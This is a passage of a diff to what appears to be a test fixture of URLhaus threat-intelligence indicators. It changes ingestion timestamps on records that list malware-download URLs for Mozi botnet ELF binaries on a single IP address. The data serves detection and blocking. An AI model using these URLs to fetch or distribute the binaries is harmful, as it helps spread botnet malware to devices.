"{\"id\":\"960996\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960996/\",\"url\":\"http://89.160.20.156:33008/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26698,7 +26698,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028526500Z", + "ingested": "2021-12-14T14:56:15.726627263Z", "original": "{\"id\":\"960997\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960997/\",\"url\":\"http://89.160.20.156:60201/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26747,7 +26747,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028533600Z", + "ingested": "2021-12-14T14:56:15.726627647Z", "original": "{\"id\":\"960998\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960998/\",\"url\":\"http://89.160.20.156:41479/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26796,7 +26796,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028541300Z", + "ingested": "2021-12-14T14:56:15.726628071Z", "original": "{\"id\":\"960999\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960999/\",\"url\":\"http://89.160.20.156:52003/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26845,7 +26845,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028548900Z", + "ingested": "2021-12-14T14:56:15.726628515Z", "original": "{\"id\":\"960995\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960995/\",\"url\":\"http://89.160.20.156:39500/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26894,7 +26894,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028657800Z", + "ingested": "2021-12-14T14:56:15.726628904Z", "original": "{\"id\":\"960994\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960994/\",\"url\":\"http://89.160.20.156:36966/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26943,7 +26943,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028664600Z", + "ingested": "2021-12-14T14:56:15.726629265Z", "original": "{\"id\":\"960991\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960991/\",\"url\":\"http://89.160.20.156:59875/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26992,7 +26992,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028671900Z", + "ingested": "2021-12-14T14:56:15.726629739Z", "original": "{\"id\":\"960992\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960992/\",\"url\":\"http://89.160.20.156:44123/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27041,7 +27041,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028678400Z", + "ingested": "2021-12-14T14:56:15.726630113Z", "original": "{\"id\":\"960993\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960993/\",\"url\":\"http://89.160.20.156:45224/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27090,7 +27090,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028682900Z", + "ingested": "2021-12-14T14:56:15.726630480Z", "original": "{\"id\":\"960990\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960990/\",\"url\":\"http://89.160.20.156:43105/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27139,7 +27139,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028688300Z", + "ingested": "2021-12-14T14:56:15.726630841Z", "original": "{\"id\":\"960984\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960984/\",\"url\":\"http://89.160.20.156:46011/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27188,7 +27188,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028697900Z", + "ingested": "2021-12-14T14:56:15.726631260Z", "original": "{\"id\":\"960985\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960985/\",\"url\":\"http://89.160.20.156:51170/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27237,7 +27237,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028704800Z", + "ingested": "2021-12-14T14:56:15.726631667Z", "original": "{\"id\":\"960986\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960986/\",\"url\":\"http://89.160.20.156:38025/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27286,7 +27286,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028711600Z", + "ingested": "2021-12-14T14:56:15.726632037Z", "original": "{\"id\":\"960987\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960987/\",\"url\":\"http://89.160.20.156:54132/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27335,7 +27335,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028718400Z", + "ingested": "2021-12-14T14:56:15.726632408Z", "original": "{\"id\":\"960988\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960988/\",\"url\":\"http://89.160.20.156:57705/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27384,7 +27384,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028741700Z", + "ingested": "2021-12-14T14:56:15.726632774Z", "original": "{\"id\":\"960989\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960989/\",\"url\":\"http://89.160.20.156:32983/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27433,7 +27433,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028748400Z", + "ingested": "2021-12-14T14:56:15.726633295Z", "original": "{\"id\":\"960983\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960983/\",\"url\":\"http://89.160.20.156:47908/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27482,7 +27482,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028755100Z", + "ingested": "2021-12-14T14:56:15.726633655Z", "original": "{\"id\":\"960982\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960982/\",\"url\":\"http://89.160.20.156:35116/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27531,7 +27531,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028761800Z", + "ingested": "2021-12-14T14:56:15.726634028Z", "original": "{\"id\":\"960978\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960978/\",\"url\":\"http://89.160.20.156:38070/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27580,7 +27580,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028768500Z", + "ingested": "2021-12-14T14:56:15.726634387Z", "original": "{\"id\":\"960979\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960979/\",\"url\":\"http://89.160.20.156:53399/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27629,7 +27629,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028775Z", + "ingested": "2021-12-14T14:56:15.726634801Z", "original": "{\"id\":\"960980\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960980/\",\"url\":\"http://89.160.20.156:39529/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27678,7 +27678,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028781800Z", + "ingested": "2021-12-14T14:56:15.726635232Z", "original": "{\"id\":\"960981\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960981/\",\"url\":\"http://89.160.20.156:33465/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27727,7 +27727,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028790Z", + "ingested": "2021-12-14T14:56:15.726635613Z", "original": "{\"id\":\"960977\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960977/\",\"url\":\"http://89.160.20.156:59085/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:16:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"07ac0n\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27776,7 +27776,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028796800Z", + "ingested": "2021-12-14T14:56:15.726635978Z", "original": "{\"id\":\"960976\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960976/\",\"url\":\"http://89.160.20.156:33799/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:09:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -27825,7 +27825,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028803500Z", + "ingested": "2021-12-14T14:56:15.726636352Z", "original": "{\"id\":\"960972\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960972/\",\"url\":\"http://89.160.20.156:40430/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27874,7 +27874,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028810100Z", + "ingested": "2021-12-14T14:56:15.726636774Z", "original": "{\"id\":\"960973\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960973/\",\"url\":\"http://89.160.20.156:43006/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27923,7 +27923,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028816600Z", + "ingested": "2021-12-14T14:56:15.726637143Z", "original": "{\"id\":\"960974\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960974/\",\"url\":\"http://89.160.20.156:33385/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27972,7 +27972,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028823400Z", + "ingested": "2021-12-14T14:56:15.726637522Z", "original": "{\"id\":\"960975\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960975/\",\"url\":\"http://89.160.20.156:56649/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28021,7 +28021,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028829900Z", + "ingested": "2021-12-14T14:56:15.726637885Z", "original": "{\"id\":\"960971\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960971/\",\"url\":\"http://89.160.20.156:55457/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28070,7 +28070,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028836500Z", + "ingested": "2021-12-14T14:56:15.726638252Z", "original": "{\"id\":\"960968\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960968/\",\"url\":\"http://89.160.20.156:52314/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28119,7 +28119,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028843100Z", + "ingested": "2021-12-14T14:56:15.726638726Z", "original": "{\"id\":\"960969\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960969/\",\"url\":\"http://89.160.20.156:41985/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28168,7 +28168,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028849800Z", + "ingested": "2021-12-14T14:56:15.726639091Z", "original": "{\"id\":\"960970\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960970/\",\"url\":\"http://89.160.20.156:53197/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -28217,7 +28217,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028856400Z", + "ingested": "2021-12-14T14:56:15.726639458Z", "original": "{\"id\":\"960967\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960967/\",\"url\":\"http://89.160.20.156:54472/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28266,7 +28266,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028863Z", + "ingested": "2021-12-14T14:56:15.726639835Z", "original": "{\"id\":\"960966\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960966/\",\"url\":\"http://89.160.20.156:38100/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28315,7 +28315,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028869900Z", + "ingested": "2021-12-14T14:56:15.726640377Z", "original": "{\"id\":\"960964\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960964/\",\"url\":\"http://89.160.20.156:33121/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28364,7 +28364,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028876600Z", + "ingested": "2021-12-14T14:56:15.726640869Z", "original": "{\"id\":\"960965\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960965/\",\"url\":\"http://89.160.20.156:39363/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28413,7 +28413,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028883300Z", + "ingested": "2021-12-14T14:56:15.726641238Z", "original": "{\"id\":\"960961\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960961/\",\"url\":\"http://89.160.20.156:42844/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28462,7 +28462,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028890100Z", + "ingested": "2021-12-14T14:56:15.726641605Z", "original": "{\"id\":\"960962\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960962/\",\"url\":\"http://89.160.20.156:45789/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28511,7 +28511,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028896600Z", + "ingested": "2021-12-14T14:56:15.726641971Z", "original": "{\"id\":\"960963\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960963/\",\"url\":\"http://89.160.20.156:34080/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28560,7 +28560,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028903300Z", + "ingested": "2021-12-14T14:56:15.726642447Z", "original": "{\"id\":\"960960\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960960/\",\"url\":\"http://89.160.20.156:56067/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28609,7 +28609,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028909900Z", + "ingested": "2021-12-14T14:56:15.726642832Z", "original": "{\"id\":\"960959\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960959/\",\"url\":\"http://89.160.20.156:34205/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28658,7 +28658,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028916600Z", + "ingested": "2021-12-14T14:56:15.726643245Z", "original": "{\"id\":\"960957\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960957/\",\"url\":\"http://89.160.20.156:53239/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28707,7 +28707,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028923100Z", + "ingested": "2021-12-14T14:56:15.726643613Z", "original": "{\"id\":\"960958\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960958/\",\"url\":\"http://89.160.20.156:53868/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28756,7 +28756,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028929800Z", + "ingested": "2021-12-14T14:56:15.726643992Z", "original": "{\"id\":\"960955\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960955/\",\"url\":\"http://89.160.20.156:39724/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28805,7 +28805,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028936400Z", + "ingested": "2021-12-14T14:56:15.726644362Z", "original": 